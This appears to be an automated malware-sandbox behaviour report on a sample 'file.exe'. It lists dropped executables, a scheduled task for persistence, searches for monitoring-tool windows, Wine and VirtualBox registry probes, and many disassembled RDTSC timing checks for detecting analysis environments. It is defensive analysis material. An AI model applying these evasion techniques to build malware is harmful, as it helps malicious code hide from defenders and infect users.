Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_E81D8DD3EACFA71E827377A4597DF902			Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_E81D8DD3EACFA71E827377A4597DF902			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_007EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		8_2_007EF98E
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Code function: 8_2_00861C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		8_2_00861C41

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\1000053001\ca798c703b.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_8-95848

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\44affe150c.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\4bea71e542.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1315E second address: C1317B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Ah 0x00000007 jmp 00007F0064E5702Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF7308 second address: BF730C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C123A4 second address: C123D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0064E5702Eh 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jmp 00007F0064E57035h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C12559 second address: C1255D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14311 second address: C14316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14316 second address: C1433B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F00646A4387h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1433B second address: C14342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14342 second address: C14353 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14353 second address: C14367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14443 second address: C144EC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F00646A4380h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F00646A437Dh 0x00000013 mov eax, dword ptr [eax] 0x00000015 jbe 00007F00646A438Dh 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jmp 00007F00646A437Fh 0x00000025 jmp 00007F00646A437Bh 0x0000002a popad 0x0000002b pop eax 0x0000002c mov ecx, dword ptr [ebp+122D2AC6h] 0x00000032 push 00000003h 0x00000034 mov esi, ecx 0x00000036 push 00000000h 0x00000038 jmp 00007F00646A4380h 0x0000003d push 00000003h 0x0000003f mov ecx, dword ptr [ebp+122D1D65h] 0x00000045 push 95F19BD3h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F00646A4389h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C144EC second address: C14522 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0064E5702Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 55F19BD3h 0x00000011 push esi 0x00000012 or dword ptr [ebp+122D1AB2h], ecx 0x00000018 pop edi 0x00000019 lea ebx, dword ptr [ebp+1244921Fh] 0x0000001f mov ecx, dword ptr [ebp+122D2986h] 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnc 00007F0064E57026h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14522 second address: C14526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14526 second address: C1452C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1452C second address: C14532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14532 second address: C14541 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14571 second address: C1457A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1457A second address: C145B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0064E5702Bh 0x0000000d nop 0x0000000e sub esi, dword ptr [ebp+122D2C06h] 0x00000014 push 00000000h 0x00000016 adc dl, FFFFFF86h 0x00000019 call 00007F0064E57029h 0x0000001e jg 00007F0064E57043h 0x00000024 push eax 0x00000025 push edx 0x00000026 js 00007F0064E57026h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C145B0 second address: C145E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007F00646A437Eh 0x00000010 jno 00007F00646A4378h 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jp 00007F00646A4382h 0x00000020 jnl 00007F00646A437Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C145E6 second address: C145F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C145F0 second address: C1466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007F00646A4382h 0x0000000f pop eax 0x00000010 mov edi, esi 0x00000012 push 00000003h 0x00000014 jmp 00007F00646A437Eh 0x00000019 push 00000000h 0x0000001b sbb ecx, 3726E7A2h 0x00000021 push 00000003h 0x00000023 mov dword ptr [ebp+122D1AB2h], ebx 0x00000029 call 00007F00646A4379h 0x0000002e jmp 00007F00646A4387h 0x00000033 push eax 0x00000034 jmp 00007F00646A437Ah 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d jno 00007F00646A4388h 0x00000043 push eax 0x00000044 push edx 0x00000045 jns 00007F00646A4376h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1475B second address: C147CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0064E57026h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F0064E57028h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1D31h], edx 0x0000002f push 00000000h 0x00000031 jl 00007F0064E5702Ch 0x00000037 mov edi, dword ptr [ebp+122D2B5Eh] 0x0000003d call 00007F0064E57029h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jmp 00007F0064E57031h 0x0000004a jmp 00007F0064E57033h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C147CC second address: C14818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F00646A4381h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push eax 0x00000014 jmp 00007F00646A4386h 0x00000019 pop eax 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jno 00007F00646A4376h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14818 second address: C14838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007F0064E57026h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jp 00007F0064E57038h 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F0064E57026h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C14838 second address: C1483C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C37225 second address: C37248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57039h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F0064E57026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C352D5 second address: C352DF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F00646A4376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C352DF second address: C35321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0064E5702Eh 0x00000008 jns 00007F0064E57026h 0x0000000e jmp 00007F0064E57031h 0x00000013 jmp 00007F0064E57033h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35321 second address: C35325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35325 second address: C35353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Bh 0x00000007 jmp 00007F0064E57036h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35353 second address: C35360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F00646A4378h 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C354C5 second address: C354CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C354CB second address: C354EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnp 00007F00646A4376h 0x00000014 popad 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C354EE second address: C354F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35656 second address: C3565B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3565B second address: C35662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3590C second address: C35912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35912 second address: C3593E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b je 00007F0064E57026h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jg 00007F0064E57026h 0x0000001d js 00007F0064E57026h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3593E second address: C3595B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4389h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35B11 second address: C35B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35B15 second address: C35B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35C56 second address: C35C5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35C5A second address: C35C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35C66 second address: C35C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35C6A second address: C35C70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35C70 second address: C35C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F0064E5703Fh 0x0000000c jmp 00007F0064E57039h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C35C9B second address: C35CA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36162 second address: C36167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2940B second address: C2942B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F00646A437Eh 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007F00646A4376h 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C0644F second address: C06453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36BC7 second address: C36BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007F00646A4382h 0x0000000f ja 00007F00646A437Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36CF8 second address: C36D0A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0064E5702Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3C747 second address: C3C74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3DFB6 second address: C3DFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnl 00007F0064E5702Eh 0x00000010 jbe 00007F0064E57028h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0064E57035h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3DFEA second address: C3DFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3E0E1 second address: C3E0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C42148 second address: C4214C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4214C second address: C421A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57033h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0064E5702Ah 0x0000000f push esi 0x00000010 pop esi 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 pushad 0x00000015 push edx 0x00000016 jg 00007F0064E57026h 0x0000001c jmp 00007F0064E5702Eh 0x00000021 pop edx 0x00000022 jmp 00007F0064E5702Ah 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0064E57031h 0x0000002e rdtsc
